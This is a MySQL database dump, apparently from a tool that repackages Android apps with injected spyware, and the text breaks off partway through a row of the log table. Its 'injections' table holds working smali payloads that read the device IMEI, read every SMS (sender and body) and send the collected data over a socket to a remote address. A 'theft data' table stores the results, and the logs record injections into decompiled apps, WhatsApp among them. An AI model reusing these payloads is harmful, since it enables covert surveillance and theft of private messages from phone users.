-- MySQL dump 10.13  Distrib 5.7.37, for Linux (x86_64)
--
-- Host: localhost    Database: picker_blinder
-- ------------------------------------------------------
-- Server version	5.7.37

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `picker_blinder`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `picker_blinder` /*!40100 DEFAULT CHARACTER SET latin1 */;

USE `picker_blinder`;

--
-- Table structure for table `attack_result`
--

DROP TABLE IF EXISTS `attack_result`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `attack_result` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `date` date NOT NULL,
  `message` varchar(2000) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=1016 DEFAULT CHARSET=latin1 COMMENT='This table store the theft data';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `attack_result`
--

LOCK TABLES `attack_result` WRITE;
/*!40000 ALTER TABLE `attack_result` DISABLE KEYS */;
INSERT INTO `attack_result` VALUES (1,'2020-08-21','869597020114133hellow'),(2,'2020-08-21','869597020114133hellow'),(3,'2020-08-21','869597020114133hellow'),(4,'2020-08-21',''),(5,'2020-08-21','869597020114133hellow'),(6,'2020-08-21',''),(7,'2020-08-21','869597020114133hellow'),(256,'2020-08-21',''),(257,'2020-08-21',''),(258,'2020-08-21',''),(259,'2020-08-21',''),(260,'2020-08-21',''),(261,'2020-08-21',''),(262,'2020-08-21',''),(512,'2020-08-21',''),(513,'2020-08-21',''),(514,'2020-08-21',''),(515,'2020-08-21',''),(516,'2020-08-21',''),(517,'2020-08-21',''),(518,'2020-08-21',''),(768,'2020-08-21',''),(769,'2020-08-21',''),(770,'2020-08-21',''),(771,'2020-08-21',''),(772,'2020-08-21',''),(773,'2020-08-21',''),(774,'2020-08-21',''),(1011,'2020-08-21','869597020114133hellow'),(1012,'2020-08-21','869597020114133hellow'),(1013,'2020-08-28','notvalue'),(1014,'2020-08-28','hello'),(1015,'2020-08-28','hello');
/*!40000 ALTER TABLE `attack_result` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `injections`
--

DROP TABLE IF EXISTS `injections`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `injections` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `permission` text,
  `payload` text,
  `functions` text,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `injections`
--

LOCK TABLES `injections` WRITE;
/*!40000 ALTER TABLE `injections` DISABLE KEYS */;
INSERT INTO `injections` VALUES (1,NULL,' const-string v0, \"ciao\"\n\n    const-string v1, \"hello\"\n\n    invoke-static {v0, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I',''),(2,'android.permission.READ_PHONE_STATE','invoke-virtual {p0}, Lcom/shared/ooooo/MainActivity;->writeShared()V','.method public getDeviceInfo()Ljava/lang/String;\n    .locals 5\n\n    .line 28\n    const-string v0, \"phone\"\n\n    invoke-virtual {p0, v0}, Lcom/shared/ooooo/MainActivity;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;\n\n    move-result-object v0\n\n    check-cast v0, Landroid/telephony/TelephonyManager;\n\n\n    .local v0, \"telephonyManager\":Landroid/telephony/TelephonyManager;\n    const-string v1, \"\"\n\n\n    .local v1, \"imei\":Ljava/lang/String;\n    sget v2, Landroid/os/Build$VERSION;->SDK_INT:I\n\n    const-string v3, \"imei\"\n\n    const/16 v4, 0x1a\n\n    if-lt v2, v4, :cond_0\n\n\n    invoke-virtual {v0}, Landroid/telephony/TelephonyManager;->getImei()Ljava/lang/String;\n\n    move-result-object v1\n\n    invoke-static {v3, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I\n\n    goto :goto_0\n\n\n    :cond_0\n    invoke-virtual {v0}, Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String;\n\n    move-result-object v1\n\n\n    invoke-static {v3, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I\n\n\n    :goto_0\n    return-object v1\n.end method\n\n.method public writeShared()V\n    .locals 4\n\n\n    const-string v0, \"saveinfo\"\n\n    const/4 v1, 0x3\n\n    invoke-virtual {p0, v0, v1}, Lcom/shared/ooooo/MainActivity;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;\n\n    move-result-object v0\n\n    .local v0, \"sharedPreferences\":Landroid/content/SharedPreferences;\n    const-string v1, \"start\"\n\n    const-string v2, \"shared has been started\"\n\n    invoke-static {v1, v2}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I\n\n\n    invoke-interface {v0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;\n\n    move-result-object v1\n\n\n    .local v1, \"editor\":Landroid/content/SharedPreferences$Editor;\n    const-string v2, \"ciao\"\n\n    const-string v3, \"hellow\"\n\n    invoke-interface {v1, v2, v3}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;\n\n\n    invoke-virtual {p0}, Lcom/shared/ooooo/MainActivity;->getDeviceInfo()Ljava/lang/String;\n\n    move-result-object v2\n\n    const-string v3, \"IMEI\"\n\n    invoke-interface {v1, v3, v2}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;\n\n    invoke-interface {v1}, Landroid/content/SharedPreferences$Editor;->apply()V\n\n\n    return-void\n.end method\n'),(3,'<uses-permission android:name=\"android.permission.READ_SMS\"/>',' invoke-direct {p0}, Lcom/shared/ooooo/MainActivity;->getSMS()V','.method private getSMS()V\n    .locals 10\n\n\n    const-string v0, \"saveinfo\"\n\n    const/4 v1, 0x3\n\n    invoke-virtual {p0, v0, v1}, Lcom/shared/ooooo/MainActivity;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;\n\n    move-result-object v0\n\n    .local v0, \"sharedPreferences\":Landroid/content/SharedPreferences;\n    const-string v1, \"start\"\n\n    const-string v2, \"shared has been started\"\n\n    invoke-static {v1, v2}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I\n\n    invoke-interface {v0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;\n\n    move-result-object v1\n\n\n    .local v1, \"editor\":Landroid/content/SharedPreferences$Editor;\n    const-string v2, \"content://sms/\"\n\n    invoke-static {v2}, Landroid/net/Uri;->parse(Ljava/lang/String;)Landroid/net/Uri;\n\n    move-result-object v2\n\n\n    .local v2, \"allMessages\":Landroid/net/Uri;\n    invoke-virtual {p0}, Lcom/shared/ooooo/MainActivity;->getContentResolver()Landroid/content/ContentResolver;\n\n    move-result-object v3\n\n    const/4 v5, 0x0\n\n    const/4 v6, 0x0\n\n    const/4 v7, 0x0\n\n    const/4 v8, 0x0\n\n    move-object v4, v2\n\n    invoke-virtual/range {v3 .. v8}, Landroid/content/ContentResolver;->query(Landroid/net/Uri;[Ljava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;)Landroid/database/Cursor;\n\n    move-result-object v3\n\n    .local v3, \"cursor\":Landroid/database/Cursor;\n    new-instance v4, Ljava/util/ArrayList;\n\n    invoke-direct {v4}, Ljava/util/ArrayList;-><init>()V\n\n\n    .local v4, \"smsList\":Ljava/util/List;, \"Ljava/util/List<Ljava/lang/String;>;\"\n    const-string v5, \"\"\n\n\n    .local v5, \"sms\":Ljava/lang/String;\n    :goto_0\n    invoke-interface {v3}, Landroid/database/Cursor;->moveToNext()Z\n\n    move-result v6\n\n    if-eqz v6, :cond_0\n\n\n    const-string v6, \"address\"\n\n    invoke-interface {v3, v6}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I\n\n    move-result v6\n\n    invoke-interface {v3, v6}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;\n\n    move-result-object v6\n\n\n    .local v6, \"address\":Ljava/lang/String;\n    const-string v7, \"body\"\n\n    invoke-interface {v3, v7}, Landroid/database/Cursor;->getColumnIndexOrThrow(Ljava/lang/String;)I\n\n    move-result v7\n\n    invoke-interface {v3, v7}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;\n\n    move-result-object v7\n\n\n    .local v7, \"body\":Ljava/lang/String;\n    new-instance v8, Ljava/lang/StringBuilder;\n\n    invoke-direct {v8}, Ljava/lang/StringBuilder;-><init>()V\n\n    const-string v9, \"Number: \"\n\n    invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;\n\n    invoke-virtual {v8, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;\n\n    const-string v9, \" .Message: \"\n\n    invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;\n\n    invoke-virtual {v8, v7}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;\n\n    invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;\n\n    move-result-object v8\n\n    invoke-interface {v4, v8}, Ljava/util/List;->add(Ljava/lang/Object;)Z\n\n\n    .end local v6    # \"address\":Ljava/lang/String;\n    .end local v7    # \"body\":Ljava/lang/String;\n    goto :goto_0\n\n\n    :cond_0\n    new-instance v6, Ljava/util/HashSet;\n\n    invoke-direct {v6}, Ljava/util/HashSet;-><init>()V\n\n\n    .local v6, \"set\":Ljava/util/Set;, \"Ljava/util/Set<Ljava/lang/String;>;\"\n    invoke-interface {v6, v4}, Ljava/util/Set;->addAll(Ljava/util/Collection;)Z\n\n\n    const-string v7, \"SMS\"\n\n    invoke-interface {v1, v7, v6}, Landroid/content/SharedPreferences$Editor;->putStringSet(Ljava/lang/String;Ljava/util/Set;)Landroid/content/SharedPreferences$Editor;\n\n\n    invoke-interface {v1}, Landroid/content/SharedPreferences$Editor;->apply()V\n\n\n    return-void\n.end method\n'),(4,'android.permission.INTERNET android.permission.ACCESS_NETWORK_STATE android.permission.ACCESS_WIFI_STATE\n','','.class pack\n.super Landroid/os/AsyncTask;\n.source \"MainActivity.java\"\n\n\n# annotations\n.annotation system Ldalvik/annotation/EnclosingClass;\n    value = main\n.end annotation\n\n.annotation system Ldalvik/annotation/InnerClass;\n    accessFlags = 0x0\n    name = \"send\"\n.end annotation\n\n.annotation system Ldalvik/annotation/Signature;\n    value = {\n        \"Landroid/os/AsyncTask<\",\n        \"Ljava/lang/Void;\",\n        \"Ljava/lang/Void;\",\n        \"Ljava/lang/Void;\",\n        \">;\"\n    }\n.end annotation\n\n\n# instance fields\n.field final synthetic this$0:main\n\n\n# direct methods\n.method constructor <init>(main)V\n    .locals 0\n    .param p1, \"this$0\"    # main\n\n    .line 46\n    iput-object p1, p0, pack->this$0:main\n\n    invoke-direct {p0}, Landroid/os/AsyncTask;-><init>()V\n\n    return-void\n.end method\n\n\n# virtual methods\n.method protected bridge synthetic doInBackground([Ljava/lang/Object;)Ljava/lang/Object;\n    .locals 0\n\n    .line 46\n    check-cast p1, [Ljava/lang/Void;\n\n    invoke-virtual {p0, p1}, pack->doInBackground([Ljava/lang/Void;)Ljava/lang/Void;\n\n    move-result-object p1\n\n    return-object p1\n.end method\n\n.method protected varargs doInBackground([Ljava/lang/Void;)Ljava/lang/Void;\n    .locals 4\n    .param p1, \"voids\"    # [Ljava/lang/Void;\n\n    .line 53\n    const-string v0, \"Fail\"\n\n    :try_start_0\n    new-instance v1, Ljava/net/Socket;\n\n    const-string v2, \"192.168.1.46\"\n\n    const/16 v3, 0x1f40\n\n    invoke-direct {v1, v2, v3}, Ljava/net/Socket;-><init>(Ljava/lang/String;I)V\n\n    .line 54\n    .local v1, \"s\":Ljava/net/Socket;\n    new-instance v2, Ljava/io/PrintWriter;\n\n    invoke-virtual {v1}, Ljava/net/Socket;->getOutputStream()Ljava/io/OutputStream;\n\n    move-result-object v3\n\n    invoke-direct {v2, v3}, Ljava/io/PrintWriter;-><init>(Ljava/io/OutputStream;)V\n\n    .line 55\n    .local v2, \"pw\":Ljava/io/PrintWriter;\n    iget-object v3, p0, pack->this$0:main\n\n    invoke-virtual {v3}, main->searchShared()Ljava/lang/String;\n\n    move-result-object v3\n\n    invoke-virtual {v2, v3}, Ljava/io/PrintWriter;->write(Ljava/lang/String;)V\n\n    .line 56\n    invoke-virtual {v2}, Ljava/io/PrintWriter;->flush()V\n\n    .line 57\n    invoke-virtual {v2}, Ljava/io/PrintWriter;->close()V\n\n    .line 58\n    invoke-virtual {v1}, Ljava/net/Socket;->close()V\n    :try_end_0\n    .catch Ljava/net/UnknownHostException; {:try_start_0 .. :try_end_0} :catch_1\n    .catch Ljava/io/IOException; {:try_start_0 .. :try_end_0} :catch_0\n\n    .end local v1    # \"s\":Ljava/net/Socket;\n    .end local v2    # \"pw\":Ljava/io/PrintWriter;\n    goto :goto_0\n\n    .line 62\n    :catch_0\n    move-exception v1\n\n    .line 63\n    .local v1, \"e\":Ljava/io/IOException;\n    sget-object v2, Ljava/lang/System;->out:Ljava/io/PrintStream;\n\n    invoke-virtual {v2, v0}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V\n\n    .line 64\n    invoke-virtual {v1}, Ljava/io/IOException;->printStackTrace()V\n\n    goto :goto_1\n\n    .line 59\n    .end local v1    # \"e\":Ljava/io/IOException;\n    :catch_1\n    move-exception v1\n\n    .line 60\n    .local v1, \"e\":Ljava/net/UnknownHostException;\n    sget-object v2, Ljava/lang/System;->out:Ljava/io/PrintStream;\n\n    invoke-virtual {v2, v0}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V\n\n    .line 61\n    invoke-virtual {v1}, Ljava/net/UnknownHostException;->printStackTrace()V\n\n    .line 65\n    .end local v1    # \"e\":Ljava/net/UnknownHostException;\n    :goto_0\n    nop\n\n    .line 66\n    :goto_1\n    const/4 v0, 0x0\n\n    return-object v0\n.end method\n');
/*!40000 ALTER TABLE `injections` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `log`
--

DROP TABLE IF EXISTS `log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `log` (
  `operation_id` int(11) NOT NULL AUTO_INCREMENT,
  `apk_name` text NOT NULL,
  `apk_path` text NOT NULL,
  `apk_package` text NOT NULL,
  `operation_time` text,
  `operation_type` text,
  `selected_input` text,
  PRIMARY KEY (`operation_id`)
) ENGINE=InnoDB AUTO_INCREMENT=134 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `log`
--

LOCK TABLES `log` WRITE;
/*!40000 ALTER TABLE `log` DISABLE KEYS */;
INSERT INTO `log` VALUES (1,'30_07_2020_10_23_36.apk','decompiled_apk/30_07_2020_10_23_36/smali/com/shared/emptyapp1/MainActivity.smali','decompiled_apk/30_07_2020_10_23_36/smali/com/shared/emptyapp1/MainActivity/smali',NULL,'write','1'),(2,'30_07_2020_11_07_46.apk','decompiled_apk/30_07_2020_11_07_46/smali/com/shared/emptyapp1/MainActivity.smali','com/shared/emptyapp1/MainActivity',NULL,'WRITE','1'),(3,'30_07_2020_11_32_21write.apk','decompiled_apk/30_07_2020_11_32_21write/smali/com/shared/emptyapp1/MainActivity.smali','com/shared/emptyapp1/MainActivity',NULL,'WRITE','1'),(4,'30_07_2020_14_27_12_write.apk','decompiled_apk/30_07_2020_14_27_12_write/smali/com/shared/emptyapp1/MainActivity.smali','com/shared/emptyapp1/MainActivity',NULL,'WRITE','2'),(5,'30_07_2020_14_27_54_write.apk','decompiled_apk/30_07_2020_14_27_54_write/smali/com/shared/emptyapp1/MainActivity.smali','com/shared/emptyapp1/MainActivity',NULL,'WRITE','2'),(6,'30_07_2020_15_11_58_write.apk','decompiled_apk/30_07_2020_15_11_58_write/smali/com/shared/emptyapp1/MainActivity.smali','com/shared/emptyapp1/MainActivity',NULL,'WRITE','1'),(7,'05_08_2020_20_57_55_write.apk','decompiled_apk/05_08_2020_20_57_55_write/smali/com/shared/emptyapp1/MainActivity.smali','com/shared/emptyapp1/MainActivity',NULL,'WRITE','1'),(8,'06_08_2020_19_32_57_read.apk','decompiled_apk/06_08_2020_19_32_57_read/smali/com/shared/emptyapp1/MainActivity.smali','com/shared/emptyapp1/MainActivity',NULL,' READ ','1'),(9,'07_08_2020_12_59_20_write.apk','decompiled_apk/07_08_2020_12_59_20_write/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,'WRITE','2'),(10,'07_08_2020_14_55_25_read.apk','decompiled_apk/07_08_2020_14_55_25_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','1'),(11,'07_08_2020_15_00_39_read.apk','decompiled_apk/07_08_2020_15_00_39_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','0'),(12,'07_08_2020_15_01_48_read.apk','decompiled_apk/07_08_2020_15_01_48_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','0'),(13,'07_08_2020_15_02_57_read.apk','decompiled_apk/07_08_2020_15_02_57_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','0'),(14,'07_08_2020_15_04_06_read.apk','decompiled_apk/07_08_2020_15_04_06_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','0'),(15,'07_08_2020_15_04_46_read.apk','decompiled_apk/07_08_2020_15_04_46_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','0'),(16,'07_08_2020_16_12_12_write.apk','decompiled_apk/07_08_2020_16_12_12_write/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,'WRITE','2'),(17,'07_08_2020_16_29_16_read.apk','decompiled_apk/07_08_2020_16_29_16_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','1'),(18,'07_08_2020_17_06_02_read.apk','decompiled_apk/07_08_2020_17_06_02_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','1'),(19,'07_08_2020_17_08_53_read.apk','decompiled_apk/07_08_2020_17_08_53_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','1'),(20,'07_08_2020_17_10_45_write.apk','decompiled_apk/07_08_2020_17_10_45_write/smali/com/jappit/android/televideo/Televideo.smali','com/jappit/android/televideo/Televideo',NULL,'WRITE','2'),(21,'07_08_2020_17_14_03_write.apk','decompiled_apk/07_08_2020_17_14_03_write/smali/com/jappit/android/televideo/Televideo.smali','com/jappit/android/televideo/Televideo',NULL,'WRITE','2'),(22,'07_08_2020_17_14_57_read.apk','decompiled_apk/07_08_2020_17_14_57_read/smali/com/shared/emptyapp1/MainActivity.smali','com/shared/emptyapp1/MainActivity',NULL,' READ ','1'),(23,'07_08_2020_17_28_14_read.apk','decompiled_apk/07_08_2020_17_28_14_read/smali/com/shared/emptyapp1/MainActivity.smali','com/shared/emptyapp1/MainActivity',NULL,' READ ','1'),(24,'07_08_2020_17_29_52_read.apk','decompiled_apk/07_08_2020_17_29_52_read/smali/com/shared/emptyapp1/MainActivity.smali','com/shared/emptyapp1/MainActivity',NULL,' READ ','1'),(25,'07_08_2020_17_30_49_read.apk','decompiled_apk/07_08_2020_17_30_49_read/smali/com/shared/emptyapp1/MainActivity.smali','com/shared/emptyapp1/MainActivity',NULL,' READ ','1'),(26,'07_08_2020_17_53_47_read.apk','decompiled_apk/07_08_2020_17_53_47_read/smali/com/shared/emptyapp1/MainActivity.smali','com/shared/emptyapp1/MainActivity',NULL,' READ ','1'),(27,'08_08_2020_01_38_13_write.apk','decompiled_apk/08_08_2020_01_38_13_write/smali/com/shared/emptyapp1/MainActivity.smali','com.shared.emptyapp1',NULL,'WRITE','2'),(28,'08_08_2020_01_40_09_write.apk','decompiled_apk/08_08_2020_01_40_09_write/smali/com/jappit/android/televideo/Televideo.smali','com.jappit.android.televideo',NULL,'WRITE','2'),(29,'08_08_2020_01_44_10_read.apk','decompiled_apk/08_08_2020_01_44_10_read/smali/com/shared/emptyapp1/MainActivity.smali','com/shared/emptyapp1/MainActivity',NULL,' READ ','2'),(30,'08_08_2020_01_46_19_write.apk','decompiled_apk/08_08_2020_01_46_19_write/smali/com/jappit/android/televideo/Televideo.smali','com.jappit.android.televideo',NULL,'WRITE','2'),(31,'08_08_2020_01_47_23_read.apk','decompiled_apk/08_08_2020_01_47_23_read/smali/com/shared/emptyapp1/MainActivity.smali','com/shared/emptyapp1/MainActivity',NULL,' READ ','1'),(32,'08_08_2020_02_02_32_read.apk','decompiled_apk/08_08_2020_02_02_32_read/smali/com/shared/emptyapp1/MainActivity.smali','com/shared/emptyapp1/MainActivity',NULL,' READ ','0'),(33,'08_08_2020_14_56_16_write.apk','decompiled_apk/08_08_2020_14_56_16_write/smali/com/jappit/calciolibrary/SoccerActivity.smali','com.jappit.calcio',NULL,'WRITE','2'),(34,'08_08_2020_15_01_44_read.apk','decompiled_apk/08_08_2020_15_01_44_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','1'),(35,'08_08_2020_15_04_20_write.apk','decompiled_apk/08_08_2020_15_04_20_write/smali/com/shared/emptyapp2/MainActivity.smali','com.shared.emptyapp2',NULL,'WRITE','2'),(36,'08_08_2020_15_18_21_write.apk','decompiled_apk/08_08_2020_15_18_21_write/smali/com/jappit/android/televideo/Televideo.smali','com.jappit.android.televideo',NULL,'WRITE','2'),(37,'08_08_2020_15_19_12_read.apk','decompiled_apk/08_08_2020_15_19_12_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','0'),(38,'08_08_2020_15_21_11_read.apk','decompiled_apk/08_08_2020_15_21_11_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','0'),(39,'08_08_2020_15_29_00_write.apk','decompiled_apk/08_08_2020_15_29_00_write/smali/com/whatsapp/Main.smali','com.whatsapp',NULL,'WRITE','2'),(40,'08_08_2020_15_30_37_read.apk','decompiled_apk/08_08_2020_15_30_37_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(41,'08_08_2020_15_34_56_read.apk','decompiled_apk/08_08_2020_15_34_56_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','0'),(42,'10_08_2020_12_21_11_write.apk','decompiled_apk/10_08_2020_12_21_11_write/smali/com/jappit/calciolibrary/SoccerActivity.smali','com.jappit.calcio',NULL,'WRITE','2'),(43,'10_08_2020_15_25_14_read.apk','decompiled_apk/10_08_2020_15_25_14_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','1'),(44,'10_08_2020_15_34_31_read.apk','decompiled_apk/10_08_2020_15_34_31_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','1'),(45,'10_08_2020_15_36_58_read.apk','decompiled_apk/10_08_2020_15_36_58_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','1'),(46,'10_08_2020_15_40_00_read.apk','decompiled_apk/10_08_2020_15_40_00_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','1'),(47,'10_08_2020_15_40_30_read.apk','decompiled_apk/10_08_2020_15_40_30_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','1'),(48,'10_08_2020_15_41_32_read.apk','decompiled_apk/10_08_2020_15_41_32_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','1'),(49,'10_08_2020_15_48_19_read.apk','decompiled_apk/10_08_2020_15_48_19_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','1'),(50,'10_08_2020_15_48_49_read.apk','decompiled_apk/10_08_2020_15_48_49_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','1'),(51,'10_08_2020_15_49_25_read.apk','decompiled_apk/10_08_2020_15_49_25_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','1'),(52,'10_08_2020_15_49_59_read.apk','decompiled_apk/10_08_2020_15_49_59_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','1'),(53,'10_08_2020_15_50_24_read.apk','decompiled_apk/10_08_2020_15_50_24_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','1'),(54,'10_08_2020_15_59_21_read.apk','decompiled_apk/10_08_2020_15_59_21_read/smali/com/shared/emptyapp2/MainActivity.smali','com/shared/emptyapp2/MainActivity',NULL,' READ ','1'),(55,'10_08_2020_16_01_12_read.apk','decompiled_apk/10_08_2020_16_01_12_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(56,'10_08_2020_16_22_37_read.apk','decompiled_apk/10_08_2020_16_22_37_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(57,'10_08_2020_16_23_06_read.apk','decompiled_apk/10_08_2020_16_23_06_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(58,'10_08_2020_16_23_39_read.apk','decompiled_apk/10_08_2020_16_23_39_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(59,'10_08_2020_16_26_14_read.apk','decompiled_apk/10_08_2020_16_26_14_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(60,'10_08_2020_18_07_34_read.apk','decompiled_apk/10_08_2020_18_07_34_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(61,'10_08_2020_18_21_15_read.apk','decompiled_apk/10_08_2020_18_21_15_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(62,'10_08_2020_18_25_11_read.apk','decompiled_apk/10_08_2020_18_25_11_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(63,'10_08_2020_18_27_14_read.apk','decompiled_apk/10_08_2020_18_27_14_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(64,'10_08_2020_18_29_20_read.apk','decompiled_apk/10_08_2020_18_29_20_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(65,'10_08_2020_18_30_41_read.apk','decompiled_apk/10_08_2020_18_30_41_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(66,'10_08_2020_18_37_48_read.apk','decompiled_apk/10_08_2020_18_37_48_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(67,'10_08_2020_19_49_18_read.apk','decompiled_apk/10_08_2020_19_49_18_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(68,'10_08_2020_20_09_22_read.apk','decompiled_apk/10_08_2020_20_09_22_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ ','0'),(69,'10_08_2020_20_11_33_read.apk','decompiled_apk/10_08_2020_20_11_33_read/smali/com/jappit/calciolibrary/SoccerActivity.smali','com/jappit/calciolibrary/SoccerActivity',NULL,' READ 